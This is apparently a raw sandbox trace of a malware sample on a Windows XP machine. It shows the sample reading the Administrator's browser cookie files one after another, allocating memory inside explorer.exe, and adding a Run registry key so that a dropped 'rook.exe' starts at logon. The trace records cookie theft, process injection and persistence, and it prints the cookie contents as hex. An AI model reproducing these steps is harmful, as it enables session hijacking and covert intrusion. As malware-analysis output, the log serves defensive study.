File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt Offset: none Length: 232 Value: 6D 62 6F 78 0A 63 68 65 63 6B 23 74 72 75 65 23 31 33 32 31 30 31 31 39 36 32 7C 73 65 73 73 69 6F 6E 23 31 33 32 31 30 31 31 39 30 31 36 37 39 2D 32 31 30 36 33 34 23 31 33 32 31 30 31 33 37 36 32 0A 61 64 6F 62 65 2E 63 6F 6D 2F 0A 31 36 30 30 0A 32 39 31 31 31 35 33 34 30 38 0A 33 30 31 38 37 36 success or wait 2633292940
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633295008
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633297457
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt Offset: none Length: 102 Value: 4D 55 49 44 0A 39 37 41 30 45 44 32 45 45 39 33 35 34 37 33 44 38 37 46 43 37 45 37 30 37 32 35 45 45 30 35 37 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 32 38 35 30 36 31 36 33 32 0A 33 30 31 38 34 33 38 33 0A 32 37 31 36 30 36 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A success or wait 2633297763
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633299571
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633302021
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt Offset: none Length: 101 Value: 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 39 30 34 31 37 36 36 34 0A 33 30 31 38 34 32 34 31 0A 34 31 31 33 33 31 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A success or wait 2633302335
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633304143
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633306592
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt Offset: none Length: 189 Value: 4D 55 49 44 0A 33 43 41 41 41 32 42 34 37 42 36 42 36 44 32 39 31 45 45 30 41 30 30 46 37 38 36 42 36 44 43 44 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 34 38 32 30 30 30 38 39 36 0A 33 30 33 33 38 33 39 39 0A 32 36 33 31 34 32 33 35 38 34 0A 33 30 31 39 31 37 32 31 0A 2A success or wait 2633306896
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[4].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633308876
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633312528
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[4].txt Offset: none Length: 190 Value: 4D 55 49 44 0A 32 34 30 44 42 43 38 44 38 34 42 30 36 38 42 35 33 37 45 44 42 44 37 36 38 30 42 30 36 38 30 42 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 39 37 37 35 36 30 35 37 36 0A 33 30 33 33 38 35 36 39 0A 32 32 35 39 31 39 37 33 36 30 0A 33 30 31 39 31 37 31 35 0A 2A success or wait 2633312833
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633314651
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633326126
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt Offset: none Length: 291 Value: 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 62 69 6E 67 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 39 30 34 31 37 36 36 34 0A 33 30 31 38 34 32 34 31 0A 34 31 31 34 34 30 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A 53 52 43 48 44 0A success or wait 2633326435
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633330156
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633332610
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[3].txt Offset: none Length: 204 Value: 53 52 43 48 55 53 52 0A 41 55 54 4F 52 45 44 49 52 3D 30 26 47 45 4F 56 41 52 3D 26 44 4F 42 3D 32 30 31 31 30 35 32 33 0A 62 69 6E 67 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 35 36 32 36 33 35 32 36 34 0A 33 30 32 39 39 38 39 31 0A 32 33 35 38 38 35 34 37 35 32 0A 33 30 31 35 33 30 33 success or wait 2633332916
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[4].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633334941
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633337382
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[4].txt Offset: none Length: 197 Value: 53 52 43 48 44 0A 4D 53 3D 32 30 36 30 34 38 36 26 44 3D 32 30 36 30 34 36 31 26 41 46 3D 4D 53 4E 30 30 35 0A 62 69 6E 67 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 34 37 32 38 35 34 39 31 32 0A 33 30 33 33 38 35 37 38 0A 34 36 37 34 30 34 34 30 30 0A 33 30 31 39 31 37 32 35 0A 2A 0A 53 52 43 48 55 53 52 success or wait 2633337688
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633339674
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633340847
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[2].txt Offset: none Length: 208 Value: 53 52 4D 5F 41 0A 32 34 30 44 42 43 38 44 38 34 42 30 36 38 42 35 33 37 45 44 42 44 37 36 38 30 42 30 36 38 30 42 0A 63 2E 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 39 37 37 35 36 30 35 37 36 0A 33 30 33 33 38 35 36 39 0A 32 32 35 39 31 39 37 33 36 30 0A 33 30 31 39 31 37 31 success or wait 2633341152
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633344339
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633346636
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[3].txt Offset: none Length: 210 Value: 53 52 4D 5F 41 0A 31 42 45 32 35 42 38 39 31 36 39 43 36 37 32 38 32 46 33 39 35 39 33 32 31 32 39 43 36 37 44 41 0A 63 2E 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 31 32 39 37 37 35 36 38 30 30 0A 33 30 33 33 38 35 37 35 0A 32 35 39 33 31 34 33 35 38 34 0A 33 30 31 39 31 37 success or wait 2633346944
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633348954
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633352703
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt Offset: none Length: 69 Value: 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 39 34 34 33 35 38 31 34 34 0A 33 30 31 34 34 36 31 31 0A 34 31 31 34 34 30 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 2633353199
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633354988
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633357460
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt Offset: none Length: 68 Value: 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 39 32 34 33 35 38 31 34 34 0A 33 30 31 34 34 36 31 31 0A 34 30 38 37 30 36 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 2633358994
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633360901
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633363370
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt Offset: none Length: 67 Value: 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 35 36 34 30 33 34 38 31 36 0A 33 30 31 34 34 37 35 34 0A 32 37 33 34 38 31 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A 0A success or wait 2633363676
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633365458
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633368027
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt Offset: none Length: 68 Value: 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 30 34 38 36 32 32 30 38 0A 33 30 31 39 32 33 32 37 0A 32 36 31 35 30 32 33 35 38 34 0A 33 30 31 39 31 37 32 31 0A 2A 0A success or wait 2633368338
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633370105
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633403094
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt Offset: none Length: 83 Value: 50 4F 50 55 50 43 48 45 43 4B 0A 31 33 30 32 33 36 35 36 33 31 36 36 38 0A 63 68 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 38 38 0A 34 39 31 32 31 31 31 33 36 0A 33 30 31 34 34 32 30 39 0A 34 30 38 31 32 38 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 2633403409
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@disqus[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633405316
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633473325
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@disqus[2].txt Offset: none Length: 584 Value: 64 69 73 71 75 73 5F 75 6E 69 71 75 65 0A 39 37 38 37 38 38 39 36 33 38 38 30 0A 64 69 73 71 75 73 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 32 36 33 36 33 36 37 34 38 38 0A 33 30 32 36 35 31 34 37 0A 36 31 35 30 35 36 32 38 38 0A 33 30 31 39 31 37 32 32 0A 2A 0A 5F 5F 75 74 6D 61 0A 34 30 success or wait 2633473641
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@dmtry[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633856165
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {1C9B46F7-F88B-AD7E-FB56-FD56EA1DDE44} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe" success or wait 2633859398
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633860118
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@dmtry[1].txt Offset: none Length: 96 Value: 61 69 64 0A 43 33 66 64 61 36 36 35 63 31 31 31 31 30 37 31 38 34 37 36 37 36 33 32 35 35 36 0A 64 6D 74 72 79 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 37 30 34 36 36 33 31 36 38 0A 33 30 32 36 34 39 34 32 0A 32 34 35 30 32 39 37 33 36 30 0A 33 30 31 39 31 37 31 35 0A 2A 0A success or wait 2633860545
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@dmtry[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633862351
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633867084
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@dmtry[2].txt Offset: none Length: 88 Value: 61 69 64 0A 43 30 66 63 31 36 34 36 63 31 31 31 31 30 32 31 36 31 32 38 36 38 31 36 35 32 34 0A 64 6D 74 72 79 2E 63 6F 6D 2F 0A 31 30 32 34 0A 37 34 34 39 39 30 32 30 38 0A 33 30 32 36 34 39 35 32 0A 34 37 31 37 38 34 34 30 30 0A 33 30 31 39 31 37 32 35 0A 2A 0A success or wait 2633867515
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633869406
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633875870
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt Offset: none Length: 223 Value: 69 64 0A 63 38 32 63 64 65 37 33 37 30 30 30 30 65 31 7C 7C 74 3D 31 33 30 36 31 36 30 34 33 35 7C 65 74 3D 37 33 30 7C 63 73 3D 30 30 32 32 31 33 66 64 34 38 37 62 33 34 64 34 31 38 37 66 65 61 32 31 66 61 0A 64 6F 75 62 6C 65 63 6C 69 63 6B 2E 6E 65 74 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 32 success or wait 2633876242
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@exp.www.msn[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633878228
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633882606
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@exp.www.msn[1].txt Offset: none Length: 137 Value: 65 78 70 72 63 0A 69 64 3D 32 33 30 36 39 62 63 36 65 36 32 31 34 61 30 32 61 33 64 64 36 30 32 65 34 35 36 66 36 36 36 39 26 62 64 3D 32 30 31 31 2D 31 32 2D 30 31 54 32 30 3A 31 37 3A 33 38 2E 38 34 39 26 76 3D 32 0A 65 78 70 2E 77 77 77 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 32 35 32 38 38 success or wait 2633882996
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633885943
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633891967
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt Offset: none Length: 88 Value: 69 30 30 0A 30 31 37 62 34 64 61 30 32 33 39 36 65 62 35 31 30 30 30 36 0A 69 76 77 62 6F 78 2E 64 65 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 36 35 36 30 35 35 30 34 0A 33 30 32 31 37 35 37 36 0A 32 36 39 34 34 39 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A 0A success or wait 2633892510
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633894318
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633896616
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt Offset: none Length: 99 Value: 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 6C 69 76 65 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 32 30 34 38 33 32 37 36 38 0A 33 30 38 35 39 32 31 37 0A 33 34 36 39 33 37 36 33 32 0A 33 30 31 34 34 30 30 38 0A 2A 0A success or wait 2633897072
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633898787
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633900016
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt Offset: none Length: 100 Value: 4D 55 49 44 0A 32 34 30 44 42 43 38 44 38 34 42 30 36 38 42 35 33 37 45 44 42 44 37 36 38 30 42 30 36 38 30 42 0A 6C 69 76 65 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 32 30 34 38 33 32 37 36 38 0A 33 30 38 35 39 32 31 37 0A 32 35 34 31 33 35 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A 2A 0A success or wait 2633900382
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633906820
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633909317
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt Offset: none Length: 108 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 64 34 62 32 32 37 62 34 35 61 38 36 34 61 63 39 38 65 33 36 61 39 34 63 64 61 39 64 64 36 35 61 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 34 30 34 34 37 31 34 39 32 38 0A 33 30 31 success or wait 2633909752
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633911562
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633914057
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt Offset: none Length: 108 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 62 30 37 65 34 37 39 62 30 37 66 36 34 65 62 30 39 66 62 62 65 64 36 66 38 66 62 31 36 66 64 33 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 32 35 34 31 38 34 31 36 30 30 0A 33 30 31 success or wait 2633915709
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633917625
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633920123
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt Offset: none Length: 108 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 39 35 61 30 63 63 36 61 31 63 39 38 34 39 64 33 61 65 30 32 31 35 37 34 31 33 62 35 38 65 36 61 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 32 31 37 31 30 34 34 37 35 32 0A 33 30 31 success or wait 2633920554
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633922369
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633924910
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt Offset: none Length: 455 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 36 64 61 34 34 66 64 61 33 33 65 61 34 61 32 39 38 34 65 66 64 30 66 33 34 66 32 30 38 34 35 35 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 34 30 34 39 35 36 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A success or wait 2633925428
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633928087
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633929238
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt Offset: none Length: 387 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 34 64 33 30 63 39 34 63 62 30 62 35 34 62 31 35 62 36 30 65 35 39 37 38 33 62 35 32 32 64 38 62 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 32 35 35 37 34 36 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A success or wait 2633929600
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633931355
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633933964
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt Offset: none Length: 521 Value: 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 32 31 34 64 38 30 63 64 33 30 33 38 34 36 65 37 38 30 32 61 63 34 62 34 63 62 33 65 37 31 32 64 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 32 32 38 34 37 30 33 35 38 34 0A 33 30 31 39 31 37 32 31 0A 2A success or wait 2633934329
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@oldapps[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633937119
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633939609
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@oldapps[2].txt Offset: none Length: 353 Value: 5F 5F 75 74 6D 61 0A 31 35 36 32 31 31 39 34 30 2E 31 31 32 32 33 35 34 36 33 34 2E 31 33 32 32 37 37 32 31 31 30 2E 31 33 32 32 37 37 32 31 31 30 2E 31 33 32 32 37 37 32 31 31 30 2E 31 0A 6F 6C 64 61 70 70 73 2E 63 6F 6D 2F 0A 31 36 30 30 0A 38 30 37 36 39 31 33 39 32 0A 33 30 33 33 38 35 37 33 0A success or wait 2633940043
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@quantserve[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633942280
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633944777
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@quantserve[1].txt Offset: none Length: 98 Value: 6D 63 0A 34 65 64 37 65 63 30 38 2D 39 39 31 31 62 2D 34 37 35 33 38 2D 61 33 39 37 39 0A 71 75 61 6E 74 73 65 72 76 65 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 35 39 39 38 34 32 38 31 36 0A 33 30 35 35 39 32 35 34 0A 36 38 34 35 38 36 32 38 38 0A 33 30 31 39 31 37 32 32 0A 2A 0A success or wait 2633945207
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@questionmarket[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633947117
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633949620
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@questionmarket[2].txt Offset: none Length: 160 Value: 6C 69 6E 6B 6A 75 6D 70 74 65 73 74 0A 31 0A 71 75 65 73 74 69 6F 6E 6D 61 72 6B 65 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 30 36 30 35 33 34 31 34 34 0A 33 30 31 39 31 37 33 36 0A 34 37 30 36 31 34 34 30 30 0A 33 30 31 39 31 37 32 35 0A 2A 0A 4C 50 0A 31 33 32 32 37 37 34 37 38 30 0A 71 75 65 73 74 success or wait 2633950050
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633953224
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633954425
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt Offset: none Length: 115 Value: 55 49 44 0A 32 39 30 36 32 66 37 32 2D 39 35 2E 31 30 30 2E 32 34 39 2E 31 33 30 2D 31 33 30 32 33 34 30 35 30 36 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 34 30 31 38 39 36 37 30 34 0A 33 30 32 39 31 30 30 31 0A 32 36 36 30 35 39 31 success or wait 2633954791
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633956642
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633959145
